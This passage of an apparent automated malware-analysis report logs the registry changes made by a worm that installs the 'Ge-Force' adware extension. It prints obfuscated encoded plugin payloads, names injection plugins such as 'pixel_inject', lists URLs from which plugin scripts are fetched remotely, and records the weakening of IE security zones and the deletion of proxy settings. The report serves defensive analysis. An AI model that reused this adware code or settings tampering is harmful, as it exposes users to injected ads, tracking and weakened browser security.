    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmI"

    [HKCU\Software\Ge-Force\Plugins\177]
    "JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
    [HKCU\Software\Ge-Force\Plugins\38]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/38.js"

    [HKCU\Software\Ge-Force\Plugins\263]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI2ZTQzNDQ1NjU0NTMwMTE3MGMxOTMxMTEwODU0NGU1MTRiMGIwYzFkMTQ1OTRiNTkxNzE1MDcwMDE5MGEwYzA2NTU1YjE1NWYwODA4MTkwNDA1MGEwYzEyNWExZjBjMTc1NzFhMTEwMTRiMDA0NzQzNTg1YTFhMGQ0YjNjM2IzNTI2M2UzYTMwMmEyMDIwMjYzNjI5MzEyOTNkMjYzNjJkMjEyNzNiMjUyMTMzMzYyYTNjMzYzYjRjMDg1ODFlMDI1NjEzMTEwZDU5NTI1NDRmNDA1NzBjMWIwYzU0M2IzYzI3MjQzYjIyM2EzMTMxMmQyMTMxM2IzNzI0MjEzNjJkMzkyNDIxM2MzYjUwMDcwODFhMTcxZDA0MGQwNzU5MjkyYjMyM2IyYzJiM2EzNjJhMjAzMzI2MmUyMDJkMmIzZDI1MmYyODMzMjYyZTNjMzAzZDNiM2IyYTIwMjkyYjUzNDU2OTU4NDk0NDQzNDYxZTAwMDUxOTEwMmQxYjA4NDE1ZTU2NTYxOTFkMTcwODFhNWU0YzRiMTUxMDFmMGEwMjFiMDEwMTUyNDkxNzVhMTAwMjAyMTUwODBkMGIwMDU4MWExNDFkNGMwYjFjMDY0YzEyNDU0NjQwNTAwMTFjNDYzYjNjMjcyNDNiMjIzYTMxMzEyZDIxMzEzYjMzMmMyNTJjMmQzYzJjMjAzYzM3MjMzNjJlMjAyNzI3MzY0YjBmNGExYzA3NGUxOTBhMWM1NDU1NTM1ZDQyNTIxNDExMTc0NTM2M2IyMDM2MzkyNzIyM2IyYTNjMmMzNjNjMjUyNjI0MmUyNzIyMzUyYzNiM2M0MjA1MGQwMjFkMDYxNTAwMDA1ZTNiMjkzNzIzMjYzMDJiM2IyZDI3MjEyNDJiMzgyNzMwMmMyODI4MmYyMTI0MmIyNDNhMjYyYTM2MmQyNzNiMjk1NjVkNjM0MzU4NDk0NDQxMTQxYTAxMTY"

    [HKCU\Software\Ge-Force\Plugins\94]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\253]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }"

    [HKCU\Software\Ge-Force\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn@"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "AppPath" = "%Program Files%\Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\1]
    "Version" = "11"

    [HKLM\SOFTWARE\Crossrider]
    "Verifier" = "7d6635bb3acc762051a59407230a02ec"

    [HKCU\Software\Ge-Force\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;)"

    [HKCU\Software\Ge-Force\Plugins\44]
    "Version" = "6"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Ge-Force\Plugins\242]
    "Name" = "price_gong_m"

    [HKLM\System\CurrentControlSet\Control\Session Manager]
    "PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\,"

    [HKCU\Software\Ge-Force\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\Ge-Force\Plugins\78]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/78.js"

    [HKCU\Software\Ge-Force\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.seǐ"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\Ge-Force\Plugins\183]
    "Name" = "tabsWrapper"

    [HKCU\Software\Ge-Force\Installer]
    "FullVersionForUrl" = "1_35_12_18"

    [HKCU\Software\Ge-Force\Plugins\223]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MDgxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFjNTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNjE0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQyNTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0MjgzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJjMDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYTAzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMxODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIyMmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMDE5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }"

    [HKCU\Software\Ge-Force\Plugins\200]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\64]
    "Name" = "appApiMessage"

    [HKCU\Software\Ge-Force\Plugins\4]
    "Version" = "5"

    [HKCU\Software\Ge-Force\Manifest]
    "Manifest" = "NA"

    [HKCU\Software\Ge-Force\Update]
    "LastCheck" = "1421039414"

    [HKCU\Software\Ge-Force\Plugins\123]
    "Name" = "intext_adv_m"

    [HKLM\SOFTWARE\Ge-Force\IE]
    "TotalProfiles" = "1"

    [HKCU\Software\InstalledBrowserExtensions\21836\Status]
    "Installed" = "1"

    [HKCU\Software\Ge-Force\Plugins\182]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/182.js"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "EF 1E DD DC A6 3D CB 28 91 69 85 29 DA 0B A4 28"

    [HKCU\Software\Ge-Force\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\Ge-Force\Plugins\1]
    "Name" = "base"

    [HKCU\Software\Ge-Force\Plugins\102]
    "Version" = "11"

    [HKCU\Software\Ge-Force\Plugins\45]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nÉ»"

    [HKCU\Software\Ge-Force\Plugins\91]
    "JavaScript" = "(function(M){var A=[].slice;var z={};var a=function(ar){if(typeof ar==string&&typeof ar.trim==function){return ar.trim();}return ar==null?:ar.toString().replace(/^\s /,).replace(/\s $/,);};function f(ar){var at=z[ar]={},au,av;ar=ar.split(/\s /);for(au=0,av=ar.length;au
    [HKCU\Software\Ge-Force\Plugins\102]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/102.js"

    [HKCU\Software\Ge-Force\Plugins\221]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Installer]
    "CodeDownloadDomain" = "http://js.newstatsclientcloud.com"

    [HKCU\Software\Ge-Force\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\Ge-Force\Manifest]
    "Description" = "Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\262]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\7]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/7.js"

    [HKCU\Software\Ge-Force\Plugins\45]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\Ge-Force\Plugins\64]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/64.js"

    [HKCU\Software\Ge-Force\Plugins\22]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/22.js"

    [HKCU\Software\Ge-Force\Plugins\123]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ3ZDZmNDAwNDBjMTkxNDMxMGExYTU1NWM0MjRlMTAxOTEwMTQ0MjU5NTgwZjBjMTgxZDE1MTA0YTE2MTcwMTRiMGUwNTE2MDYxNzRhMWIxOTFhNDkwODFmNTcwNDBhMTAxZDBlMDM0ODA4MWY0NzBjMDIwZDFjNGIxNDE0MGQxZjBiMWYwZDAwMWQwNDUxMTUxNzBlMTEwOTU5M2IyNzM1MjUyOTMxM2YyYTI0MjAyMTJhMjkzMjNlMzYyOTM2MjkyMTIwMjcyNTIyMjQzZDI1M2MzMjNiNDIxNTE3MGYwYTBiMDIxMzFlNTk1YzVlMWExZTA4MDkwZjE3MDEwYjE2NDU0NjQ3NTY1MjJhM2U0YjA2MTYxOTE4MTM1YjNkMzMzYjNmMmIzNzJiMjQzZTIyMjczZTI3MmMzNDM0MjczODM2MmIyNzMzMjc0ZjQ4NmU3MTU0MWYxMjE2MWMwYjM4MTYwODVhNGM1NzQ0MGExODBjMWQxNzVlNTc1OTFlMDgxNjA5MDAxOTRhMGExOTAwNWEwYTBiMDIxMzFlNGEwNzE3MWI1ODBjMTE0MzExMDMxMDAxMDAwMjU5MGMxMTUzMTkwYjBkMDA0NTE1MDUwOTExMWYwYTA0MDAwMTBhNTAwNDEzMDAwNTFjNTAzYjNiM2IyNDM4MzUzMTNlMzEyOTIxMzYyNzMzMmYzMjI3MjIzYzI4MjAzYjJiMjMzNTM5MmIyODI3MzI0MjA5MTkwZTFiMGYwYzA3MGI1MDVjNDIxNDFmMTkwZDAxMDMxNDAyMTY1OTQ4NDY0NzU2MjQyYTVlMGYxNjA1MTYxMjRhMzkzZDJmMmEyMjM3MzcyYTNmMzMyMzMwMzMzOTNkMzQzYjM2MzczYTIzM2QzMzVhNDE2ZTZkNWEwNjFiMTMwNTA1MTYyNDAwNDY0MjU2NDY1NDUxNjYwNQ==', 'vwfblxmddx'); }"

    [HKCU\Software\Ge-Force\Plugins\40]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi)"

    [HKCU\Software\Ge-Force\Plugins\253]
    "Name" = "pixel_inject"

    [HKCU\Software\Ge-Force\Plugins\46]
    "Name" = "IETimers"

    [HKCU\Software\Ge-Force\Plugins\354]
    "Name" = "categories"

    [HKCU\Software\Ge-Force\Plugins\220]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/220.js"

    [HKCU\Software\Ge-Force\Plugins\345]
    "Name" = "pluginsVerticals"

    [HKCU\Software\Ge-Force\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "Publisher" = "iWebar"

    [HKCU\Software\Ge-Force\Plugins\9]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/9.js"

    [HKCU\Software\Ge-Force\Plugins\2]
    "Name" = "ie8_fix_1"
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/2.js"

    [HKCU\Software\Ge-Force\Plugins\38]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO"

    [HKCU\Software\Ge-Force\Plugins\42]
    "Version" = "10"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

    [HKCU\Software\Ge-Force\Plugins\350]
    "Version" = "1"

    [HKCU\Software\Ge-Force\Plugins\47]
    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f""

    [HKCU\Software\Ge-Force\Plugins\220]
    "Name" = "icm_base_m"

    [HKCU\Software\Ge-Force\Plugins\242]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/242.js"

    [HKCU\Software\Ge-Force\Plugins\14]
    "Name" = "CrossriderUtils"

    [HKCU\Software\Ge-Force\Plugins\123]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/123.js"

    [HKCU\Software\Ge-Force\Plugins\184]
    "Version" = "10"

    [HKCU\Software\Ge-Force\Plugins\4]
    "Name" = "jquery_1_7_1"

    [HKCU\Software\Ge-Force\Plugins\195]
    "Name" = "icm_convertmedia_m"

    [HKCU\Software\Ge-Force\Plugins\102]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI2NzUxNTI0MjUyNGUwYzA0MWUwOTM4MDMxZTQwNDg0YzQ2MTgxZTBkMWQ0YjVkNGQxYjQyMDcwMjA4MWYwNzAyNWMwYjFjMGEwYjVmMDkwYjBmMTc1ZDA4MTMxYTA1MDMwOTBiMDQwMTA2NGMxODFmNWIxMzAyMTgwMzFmMTcwZTRmMGYxNjE0MTgyNjMyMmUzMTMwM2QzZjM3MjIyMzNkMjgyMzJkMjcyYTM4MjEzZTJlM2MyOTJlMjEzNzMwMzMyZDM0MzUyNjRiMTAwMjEyMjYwNTEwMWMwZjQ0MzIyZTMxMzAzZDNmMzcyMjIzM2QyODIzMmQyMzIyM2MzYjNlMmIzNDI4MmUyZDQ0MWEwNTAwNGQzNTI2MmUyMzNkMzEyMTNlMmQzNDJmMmIzMjI0MjEyNzIwMzMyZDM0MzUyNjRmNWQ3ODQyNTI0YzQ0NTIwMjBkMTkwMTAxMzcwMDAwNDY0YTRhNWIwNTA1MDYxMjAxNTY0YjVmMDMyNjBlMDMxMDA0MTgxZjNiMTkwNDFmMDI1ZjA2MGUwMTBmMDAxZTQ0MWEwMjFjNWQwMTAwMGUwMjVmMDAxODFiMTAwMTAxMDAwNTE0MDQ0NDEzMWU0ZTExMGExMzAyMGExNTA2NDQwZTAzMTYxMDJkMzMzYjMzMzgzNjNlMjIyMDJiMzYyOTM2MmYyZjIxMzkzNDNjMjYzNzI4M2IyMzNmM2IzMjM4MzYzZDJkNGEwNTAwMWEyZDA0MDUxZTA3NGYzMzNiMzMzODM2M2UyMjIwMmIzNjI5MzYyZjJiMjkzZDJlM2MyMzNmMjkzYjJmNGMxMTA0MTU0ZjNkMmQyZjM2M2YzOTJhM2YzODM2MjcyMDMzMzEyMzJmMmIzMjM4MzYzZDJkNGU0ODdhNGE1OTRkNTE1MDEyMWUxOTAzMTkwNDMwMDk1MzQ4NDI0MzVjNTY3YTE3', 'ymqrbrldpj'); }"

    [HKCU\Software\Ge-Force\Manifest]
    "SetNewTab" = "false"

    [HKCU\Software\Ge-Force\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){e"

    [HKCU\Software\Ge-Force\Manifest]
    "ThanksUrl" = "NA"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "AppPath" = "%Program Files%\Ge-Force"

    The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass" = "1"

    The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

    "IntranetName" = "1"

    The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Worm deletes the following registry key(s):

    [HKCU\Software\Ge-Force\Plugins\301]
    [HKCU\Software\Ge-Force\Plugins\263]
    [HKCU\Software\Ge-Force\Plugins\242]
    [HKCU\Software\Ge-Force\Plugins\184]
    [HKCU\Software\Ge-Force\Plugins\183]
    [HKCU\Software\Ge-Force\Plugins\182]
    [HKCU\Software\Ge-Force\Plugins\246]
    [HKCU\Software\Ge-Force\Plugins\180]
    [HKCU\Software\Ge-Force\Plugins\104]
    [HKCU\Software\Ge-Force\Plugins\2]
    [HKCU\Software\Ge-Force\Plugins\223]
    [HKCU\Software\Ge-Force\Plugins\220]
    [HKCU\Software\Ge-Force\Plugins\207]
    [HKCU\Software\Ge-Force\Plugins\200]
    [HKCU\Software\Ge-Force\Plugins\93]
    [HKCU\Software\Ge-Force\Plugins\91]
    [HKCU\Software\Ge-Force\Plugins\94]
    [HKCU\Software\Ge-Force\Plugins\221]
    [HKCU\Software\Ge-Force\Plugins\177]
    [HKCU\Software\Ge-Force\Plugins\345]
    [HKCU\Software\Ge-Force\Plugins\72]
    [HKCU\Software\Ge-Force\Plugins\17]
    [HKCU\Software\Ge-Force\Plugins\14]
    [HKCU\Software\Ge-Force\Plugins\38]
    [HKCU\Software\Ge-Force\Plugins\13]
    [HKCU\Software\Ge-Force\Plugins\78]
    [HKCU\Software\Ge-Force\Plugins\35]
    [HKCU\Software\Ge-Force\Plugins\36]
    [HKCU\Software\Ge-Force\Plugins\37]
    [HKCU\Software\Ge-Force\Plugins\43]
    [HKCU\Software\Ge-Force\Plugins\39]
    [HKCU\Software\Ge-Force\Plugins\64]
    [HKCU\Software\Ge-Force\Plugins\273]
    [HKCU\Software\Ge-Force\Plugins\41]
    [HKCU\Software\Ge-Force\Plugins\40]
    [HKCU\Software\Ge-Force\Plugins\192]
    [HKCU\Software\Ge-Force\Plugins\42]
    [HKCU\Software\Ge-Force\Plugins\253]
    [HKCU\Software\Ge-Force\Plugins\195]
    [HKCU\Software\Ge-Force\Plugins\47]
    [HKCU\Software\Ge-Force\Plugins\44]
    [HKCU\Software\Ge-Force\Plugins]
    [HKCU\Software\Ge-Force\Plugins\46]
    [HKCU\Software\Ge-Force\Plugins\354]
    [HKLM\SOFTWARE\Tempo]
    [HKCU\Software\Ge-Force\Plugins\286]
    [HKCU\Software\Ge-Force\Plugins\281]
    [HKCU\Software\Ge-Force\Plugins\4]
    [HKCU\Software\Ge-Force\Plugins\7]
    [HKCU\Software\Ge-Force\Plugins\9]
    [HKCU\Software\Ge-Force\Plugins\1]
    [HKCU\Software\Ge-Force\Plugins\123]
    [HKCU\Software\Ge-Force\Plugins\3]
    [HKCU\Software\Ge-Force\Plugins\28]
    [HKCU\Software\Ge-Force\Plugins\22]
    [HKCU\Software\Ge-Force\Plugins\21]
    [HKCU\Software\Ge-Force\Plugins\45]
    [HKCU\Software\Ge-Force\Plugins\102]

    The Worm deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process %original file name%.exe:1616 makes changes in the system registry.
